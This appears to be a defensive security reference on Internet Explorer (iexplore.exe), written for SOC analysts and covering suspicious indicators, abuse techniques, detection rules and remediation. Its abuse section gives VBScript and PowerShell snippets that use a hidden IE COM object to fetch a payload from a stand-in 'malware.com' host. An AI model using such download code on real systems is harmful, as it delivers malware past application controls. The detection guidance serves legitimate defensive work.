iexplore.exe - Internet Explorer Security Analysis
iexplore.exe is Microsoft Internet Explorer, a legacy browser officially retired but still present on Windows systems. IE's legacy COM interfaces and poor security model make it a favorite target for malware. Attackers abuse iexplore.exe for COM-based downloads, process injection, and leveraging its trusted status to bypass application controls.
Risk Summary
CRITICAL priority for SOC triage. iexplore.exe is deprecated but still exploited. Its presence in modern attack chains usually indicates **malicious activity**. Monitor for unexpected launches, especially from cmd.exe/powershell.exe, and its use for downloading files via COM automation.
Overview
What is iexplore.exe?
iexplore.exe is Microsoft Internet Explorer, a legacy web browser that has been officially retired.
History
- Retirement: June 2022 (Win 10), earlier for Win 11
- Still Present: Exists on Windows for compatibility
- Replaced By: Microsoft Edge
Why Still Relevant
Attacker Value:
- Pre-installed on Windows
- Trusted Microsoft binary
- COM automation capabilities
- Legacy vulnerabilities
Security Significance
- Deprecated Security: No longer receiving full updates
- COM Exploitation: Heavily abused for downloads
- Process Injection Target: Common injection host
- Application Control Bypass: Trusted binary status
Normal Behavior
Expected Process State
| Property | Expected Value |
|---|---|
| Path | C:\Program Files\Internet Explorer\iexplore.exe |
| Parent | explorer.exe (rare, legitimate) |
| Instances | Usually 0 (deprecated) |
| User | Logged-in user |
| Network | Should be rare/none |
Modern Reality
In modern environments, iexplore.exe running is unusual and warrants investigation.
⚠️ iexplore.exe activity in 2024+ is suspicious by default
Legacy Process Model
iexplore.exe (frame process)
└── iexplore.exe (tab process, optional)
Common Locations
C:\Program Files\Internet Explorer\iexplore.exe
C:\Program Files (x86)\Internet Explorer\iexplore.exe
Suspicious Indicators
Legitimate vs Suspicious
LEGITIMATE (Rare)
Path: C:\Program Files\Internet Explorer\iexplore.exe
Parent: explorer.exe
User: Logged-in user
Context: Legacy application requirement
SUSPICIOUS (Common)
Path: C:\Temp\iexplore.exe
Parent: cmd.exe, powershell.exe, wscript.exe
User: SYSTEM (unexpected)
Context: No business justification for IE use
Behavior: Downloading files, visiting unknown URLs
Default Assumption
| Context | Assumption | Action |
|---|---|---|
| Server | SUSPICIOUS | Investigate |
| Modern Workstation | SUSPICIOUS | Investigate |
| Legacy App Requirement | Verify | Document exception |
| Automated Launch | MALICIOUS | Contain immediately |
Abuse Techniques
Attack Techniques
Technique #1: COM-Based Download (T1105)
Malicious Download via COM:
```vbscript
' VBScript using IE COM object
Set ie = CreateObject("InternetExplorer.Application")
ie.Visible = False
ie.Navigate "http://malware.com/payload.exe"
Do While ie.Busy : WScript.Sleep 100 : Loop
```
PowerShell Variant:
```powershell
$ie = New-Object -ComObject InternetExplorer.Application
$ie.Visible = $false
$ie.Navigate("http://malware.com/payload.exe")
```
Technique #2: Living-off-the-Land
Using IE for C2:
- Trusted binary status
- Legitimate network behavior
- Bypasses application whitelisting
Technique #3: Process Injection Target (T1055)
Malware injects into iexplore.exe because:
- Trusted process
- Expected to have network activity
- Often allowed through firewalls
Technique #4: Browser Pivoting (T1185)
Injecting into IE to:
- Steal session cookies
- Perform actions as user
- Access authenticated web applications
Detection Guidance
Detection Strategies
Priority #1: Any IE Execution (Modern Systems)
Process = "iexplore.exe"
→ ALERT: HIGH - IE deprecated, investigate
PowerShell Check:
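```powershell
# List every running IE instance with its parent PID and command line
Get-Process iexplore -ErrorAction SilentlyContinue | ForEach-Object {
    Write-Warning "IE RUNNING - Investigate: PID $($_.Id)"
    # Get-CimInstance replaces the deprecated Get-WmiObject (not available in PowerShell 7)
    Get-CimInstance Win32_Process -Filter "ProcessId=$($_.Id)" |
        Select-Object ProcessId, ParentProcessId, CommandLine
}
```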
Priority #2: Automated/Script Launch
Process = "iexplore.exe" AND
Parent IN ["cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe"]
→ ALERT: CRITICAL - Likely malicious
Priority #3: COM Object Creation
ScriptEngine CREATES "InternetExplorer.Application"
→ ALERT: HIGH - IE COM automation
Priority #4: Hidden Window
Process = "iexplore.exe" AND
WindowVisible = false
→ ALERT: CRITICAL - Hidden IE instance
Remediation Steps
Protection and Remediation
Defense: Disable Internet Explorer
Via DISM:
dism /online /Disable-Feature /FeatureName:Internet-Explorer-Optional-amd64 /NoRestart
Via Group Policy:
Computer Configuration → Administrative Templates →
Windows Components → Internet Explorer →
Disable Internet Explorer 11 as a standalone browser
Defense: Application Control
Block iexplore.exe execution except for documented exceptions.
If Compromise Suspected
- Terminate all iexplore.exe processes
- Identify parent process chain
- Check for downloaded files
- Review IE history/cache
- Scan for persistence mechanisms
- Check for COM object abuse
Investigation Checklist
- Determine business justification for IE usage
- Identify parent process launching IE
- Check if window is visible or hidden
- Review command line arguments
- Examine network connections
- Check IE history and cache
- Look for downloaded files
- Scan for process injection
- Verify no scheduled tasks launching IE